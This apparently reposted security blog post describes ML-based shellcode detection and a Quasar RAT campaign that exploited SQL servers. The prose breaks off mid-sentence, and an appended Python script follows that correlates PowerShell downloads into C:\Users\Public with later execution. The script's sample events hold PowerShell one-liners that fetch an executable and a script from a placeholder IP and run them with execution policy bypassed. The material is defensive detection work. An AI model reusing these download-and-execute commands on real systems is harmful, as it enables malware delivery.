Quasar crypto


Author: Admin | 2025-04-28

Shellcode

When analyzing the shellcode, a human malware analyst may notice that the malicious code is searching for the MZ and PE headers, which are indicative of Windows executable files. However, building a native detection system based solely on these patterns would result in numerous false positives in a production environment.

Our ML model goes beyond these obvious indicators. It incorporates additional, seemingly unrelated conditions that might not make immediate sense to a human analyst. By analyzing complex patterns and correlations within the data, the model generates highly accurate prevention rules. This approach ensures effective detection of shellcode with minimal false positives.

Figure 4. End user notification for the prevention of the initial loader

Second Use Case - Quasar RAT Leveraging Shellcode

Quasar RAT is an open source .NET malware that is used by a variety of threat actors. Over the past few years, the malware has been reported as being distributed using different methods, including via other malware and through exploitation of vulnerable and unpatched internet-facing servers and applications.

In May 2024, we investigated a Quasar RAT infection whose infection vector was the exploitation of vulnerable SQL servers. In this case, the attacker used PowerShell to download different components, including binaries, scripts and configuration files, from a known Quasar RAT command and control (C2) server. The certificate of this C2 can be seen in Figure 5 below.

Figure 5. Quasar RAT's certificate used for the command and control server

The payloads that were delivered in this campaign were saved in the compromised environment under the path C:\Users\Public and then executed. All of
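The delivery chain described above (PowerShell downloading components into C:\Users\Public, followed by execution from that path) can be expressed as a simple correlation rule over process-creation telemetry. The following is an added example and is not code from the original post or from the investigation it describes; the Sysmon-style process-creation records, the hostnames, the URLs and the file names in it are constructed for illustration, and the field layout (timestamp, host, image, command line) is an assumption about the log source.

```python
"""Correlate 'PowerShell downloads into C:\\Users\\Public' with a later
process start from that path on the same host (added example, not the
original post's code; all events below are constructed)."""
import re
from datetime import datetime

# Constructed Sysmon Event ID 1 style records: (UtcTime, Computer, Image, CommandLine).
SAMPLE_EVENTS = [
    ("2024-05-06T10:01:02Z", "SQL01", r"C:\Windows\System32\cmd.exe",
     "cmd.exe /c whoami"),
    ("2024-05-06T10:01:09Z", "SQL01",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -nop -w hidden -c \"(New-Object Net.WebClient)"
     ".DownloadFile('https://198.51.100.7/c.exe','C:\\Users\\Public\\client.exe')\""),
    ("2024-05-06T10:01:15Z", "SQL01",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -nop -c \"Invoke-WebRequest -Uri https://198.51.100.7/r.ps1"
     " -OutFile C:\\Users\\Public\\run.ps1\""),
    ("2024-05-06T10:01:40Z", "SQL01",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -ExecutionPolicy Bypass -File C:\\Users\\Public\\run.ps1"),
    ("2024-05-06T10:02:05Z", "SQL01", r"C:\Users\Public\client.exe",
     r"C:\Users\Public\client.exe"),
    # Different host, binary under Public but no preceding download: no alert.
    ("2024-05-06T11:30:00Z", "WS02", r"C:\Users\Public\Tools\putty.exe",
     r"C:\Users\Public\Tools\putty.exe"),
]

# Common PowerShell download primitives (assumed indicator list, extend as needed).
DOWNLOAD_RE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer"
    r"|\bcurl\b|\bwget\b", re.I)
# Any path under C:\Users\Public, tolerating mixed slashes and quoting.
PUBLIC_PATH_RE = re.compile(r"c:[\\/]+users[\\/]+public[\\/]+[^\s'\"<>]+", re.I)


def normalize(path: str) -> str:
    """Lower-case and collapse slashes so equivalent paths compare equal."""
    return re.sub(r"[\\/]+", r"\\", path.strip().lower())


def parse_ts(ts: str) -> datetime:
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def is_powershell(image: str) -> bool:
    return normalize(image).endswith(("\\powershell.exe", "\\pwsh.exe"))


def detect_download_then_execute(events, window_seconds=3600):
    """Return alerts for processes that run (as image or as a command-line
    argument) a file PowerShell downloaded into C:\\Users\\Public on the same
    host within `window_seconds` of the download."""
    downloads = {}  # (host, normalized path) -> (download time, command line)
    alerts = []
    for ts, host, image, cmdline in sorted(events, key=lambda e: e[0]):
        when = parse_ts(ts)
        if is_powershell(image) and DOWNLOAD_RE.search(cmdline):
            for path in PUBLIC_PATH_RE.findall(cmdline):
                downloads[(host, normalize(path))] = (when, cmdline)
            # A one-liner that downloads and executes in the same command is
            # not matched here; it needs its own rule (deliberate limitation).
            continue
        candidates = {normalize(image)}
        candidates |= {normalize(p) for p in PUBLIC_PATH_RE.findall(cmdline)}
        for path in candidates:
            hit = downloads.get((host, path))
            if hit is None:
                continue
            age = (when - hit[0]).total_seconds()
            if 0 <= age <= window_seconds:
                alerts.append({"host": host, "time": ts, "image": image,
                               "executed": path,
                               "seconds_since_download": age,
                               "download_cmdline": hit[1]})
    return alerts


if __name__ == "__main__":
    for alert in detect_download_then_execute(SAMPLE_EVENTS):
        print(f"[{alert['host']}] {alert['time']} {alert['executed']} "
              f"ran {alert['seconds_since_download']:.0f}s after download")
```

On the constructed events this flags the PowerShell run of run.ps1 and the start of client.exe on SQL01, and stays quiet on WS02, where a binary under Public starts with no preceding download. The rule is a hunting aid, not a substitute for the prevention described in the post: legitimate installers occasionally stage files under C:\Users\Public, so the download-then-execute pairing, rather than the path alone, is what keeps the false-positive rate manageable.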
